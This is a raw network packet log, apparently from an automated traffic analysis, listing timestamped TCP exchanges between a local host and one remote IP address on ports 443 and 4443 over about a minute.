                                            Dec 6, 2024 22:11:16.957670927 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:16.957670927 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:16.962846994 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:16.962866068 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:16.962929010 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:16.962938070 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:16.962964058 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:16.962986946 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:16.968741894 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:16.968755960 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:16.968832016 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:16.968838930 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:16.968883038 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.030901909 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.030951023 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.031019926 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.031039000 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.031064034 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.031107903 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.057344913 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.057420969 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.057463884 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.057483912 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.057529926 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.057529926 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.135031939 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.135096073 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.135121107 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.135133028 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.135165930 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.135179996 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.140286922 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.140333891 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.140358925 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.140364885 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.140403032 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.140427113 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.154376030 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.154419899 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.154465914 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.154473066 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.154501915 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.154515982 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.160172939 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.160218954 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.160258055 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.160268068 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.160312891 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.160312891 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.165566921 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.165610075 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.165659904 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.165677071 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.165724039 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.165724039 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.171576023 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.171619892 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.171658039 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.171665907 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.171701908 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.171722889 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.216027975 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.216075897 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.216118097 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.216129065 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.216157913 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.216170073 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.249237061 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.249322891 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.249367952 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.249378920 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.249391079 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.249456882 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.326913118 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.326940060 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.327016115 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.327039957 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.327157021 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.332357883 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.332374096 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.332473040 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.332480907 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.332602978 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.346138954 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.346157074 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.346337080 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.346350908 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.346483946 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.351955891 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.351994991 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.352032900 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.352039099 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.352085114 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.352085114 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.357467890 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.357482910 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.357538939 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.357553005 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.357664108 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.363352060 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.363367081 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.363456011 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.363464117 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.363512993 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.407944918 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.407974958 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.408023119 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.408037901 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.408083916 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.408083916 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.409686089 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.409764051 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:17.409775019 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:17.409812927 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:18.021044970 CET49707443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:18.021073103 CET44349707185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:33.170118093 CET497334443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:33.290831089 CET444349733185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:33.291923046 CET497334443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:33.293389082 CET497334443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:33.413117886 CET444349733185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:34.878926992 CET444349733185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:34.880748987 CET497334443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:34.913914919 CET497394443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:35.000993967 CET444349733185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:35.001053095 CET497334443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:35.033765078 CET444349739185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:35.035471916 CET497394443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:35.035471916 CET497394443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:35.155405045 CET444349739185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:36.501916885 CET444349739185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:36.503489971 CET497394443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:36.623568058 CET444349739185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:36.623645067 CET497394443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:36.636188984 CET497414443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:36.755942106 CET444349741185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:36.756042004 CET497414443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:36.757502079 CET497414443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:36.877197027 CET444349741185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:38.216408014 CET444349741185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:38.221647024 CET497414443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:38.342228889 CET444349741185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:38.347920895 CET497414443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:38.357731104 CET497464443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:38.477705956 CET444349746185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:38.477858067 CET497464443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:38.479367018 CET497464443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:38.599097013 CET444349746185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:39.948884010 CET444349746185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:39.950555086 CET497464443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:40.070738077 CET444349746185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:40.070858955 CET497464443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:40.091268063 CET497524443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:40.211407900 CET444349752185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:40.211564064 CET497524443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:40.213043928 CET497524443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:40.332784891 CET444349752185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:41.680079937 CET444349752185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:41.682094097 CET497524443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:41.802321911 CET444349752185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:41.802470922 CET497524443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:41.823396921 CET497564443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:41.943195105 CET444349756185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:41.943337917 CET497564443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:41.945080042 CET497564443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:42.065160990 CET444349756185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:43.394124031 CET444349756185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:43.395716906 CET497564443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:43.516078949 CET444349756185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:43.516166925 CET497564443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:43.543385029 CET497614443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:43.663260937 CET444349761185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:43.663418055 CET497614443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:43.665031910 CET497614443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:43.784893990 CET444349761185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:45.177700043 CET444349761185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:45.185684919 CET497614443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:45.308011055 CET444349761185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:45.308087111 CET497614443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:45.323827028 CET497644443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:45.443903923 CET444349764185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:45.444056034 CET497644443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:45.445751905 CET497644443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:45.565584898 CET444349764185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:47.057837009 CET444349764185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:47.059578896 CET497644443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:47.189594984 CET444349764185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:47.189753056 CET497644443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:47.198278904 CET497694443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:47.318039894 CET444349769185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:47.318125010 CET497694443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:47.320147038 CET497694443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:47.440996885 CET444349769185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:48.904329062 CET444349769185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:48.907588005 CET497694443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:49.027784109 CET444349769185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:49.027853966 CET497694443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:49.043410063 CET497734443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:49.163378000 CET444349773185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:49.167967081 CET497734443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:49.169487000 CET497734443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:49.289186001 CET444349773185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:50.930134058 CET444349773185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:50.932137966 CET497734443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:51.052742958 CET444349773185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:51.052817106 CET497734443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:51.072401047 CET497784443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:51.192365885 CET444349778185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:51.192512989 CET497784443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:51.193985939 CET497784443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:51.313878059 CET444349778185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:52.867885113 CET444349778185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:52.869457006 CET497784443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:52.989830971 CET444349778185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:52.989888906 CET497784443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:53.009900093 CET497824443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:53.129755974 CET444349782185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:53.129817009 CET497824443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:53.131274939 CET497824443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:53.251080990 CET444349782185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:54.653659105 CET444349782185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:54.655332088 CET497824443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:54.775639057 CET444349782185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:54.775698900 CET497824443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:54.795736074 CET497844443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:54.915513992 CET444349784185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:54.915661097 CET497844443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:54.917206049 CET497844443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:55.036948919 CET444349784185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:56.353245974 CET444349784185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:56.354779005 CET497844443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:56.475116968 CET444349784185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:56.475920916 CET497844443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:56.494930983 CET497854443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:56.614655018 CET444349785185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:56.615888119 CET497854443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:56.617316008 CET497854443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:56.740119934 CET444349785185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:58.056699038 CET444349785185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:58.099476099 CET497854443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:58.219557047 CET444349785185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:58.219669104 CET497854443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:58.321033001 CET497864443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:58.440857887 CET444349786185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:58.440999985 CET497864443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:58.452136993 CET497864443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:11:58.572622061 CET444349786185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:59.885176897 CET444349786185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:11:59.889224052 CET497864443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:00.009660959 CET444349786185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:00.011912107 CET497864443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:00.027873039 CET497874443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:00.148906946 CET444349787185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:00.149036884 CET497874443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:00.150755882 CET497874443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:00.270550966 CET444349787185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:01.598551035 CET444349787185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:01.600414038 CET497874443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:01.721201897 CET444349787185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:01.721255064 CET497874443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:01.764448881 CET497894443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:01.884710073 CET444349789185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:01.884850979 CET497894443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:01.886512995 CET497894443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:02.006304026 CET444349789185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:03.330734015 CET444349789185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:03.333333015 CET497894443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:03.454468012 CET444349789185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:03.454518080 CET497894443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:03.488604069 CET497904443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:03.608437061 CET444349790185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:03.611239910 CET497904443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:03.663961887 CET497904443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:03.783750057 CET444349790185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:05.261639118 CET444349790185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:05.262998104 CET497904443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:05.383126020 CET444349790185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:05.383198977 CET497904443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:05.402064085 CET497914443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:05.521986008 CET444349791185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:05.526021004 CET497914443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:05.527555943 CET497914443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:05.648472071 CET444349791185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:06.976794004 CET444349791185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:06.978585958 CET497914443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:07.101886034 CET444349791185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:07.101986885 CET497914443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:07.120403051 CET497924443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:07.240135908 CET444349792185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:07.240247011 CET497924443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:07.241880894 CET497924443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:07.362919092 CET444349792185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:08.678684950 CET444349792185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:08.684540987 CET497924443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:08.806121111 CET444349792185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:08.806194067 CET497924443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:08.822271109 CET497934443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:08.942301035 CET444349793185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:08.942445993 CET497934443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:08.944052935 CET497934443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:09.064824104 CET444349793185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:10.389496088 CET444349793185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:10.391208887 CET497934443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:10.511413097 CET444349793185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:10.511528969 CET497934443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:10.541714907 CET497944443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:10.661571026 CET444349794185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:10.661674976 CET497944443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:10.663183928 CET497944443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:10.783001900 CET444349794185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:11.193447113 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:11.193504095 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:11.193594933 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:11.205158949 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:11.205180883 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:12.145798922 CET444349794185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:12.147413015 CET497944443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.267692089 CET444349794185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:12.270020008 CET497944443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.291728973 CET497964443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.411489010 CET444349796185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:12.411690950 CET497964443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.414484978 CET497964443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.534250975 CET444349796185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:12.665719032 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:12.665790081 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.685858965 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.685874939 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:12.686263084 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:12.686330080 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.689007044 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:12.735330105 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.334372044 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.334395885 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.334513903 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:13.334541082 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.334588051 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:13.462923050 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.462948084 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.462982893 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:13.462995052 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.463035107 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:13.567414999 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.567435980 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.567529917 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:13.567538977 CET44349795185.234.216.175192.168.2.5
                                            Dec 6, 2024 22:12:13.567576885 CET49795443192.168.2.5185.234.216.175
                                            Dec 6, 2024 22:12:13.638978958 CET44349795185.234.216.175192.168.2.5
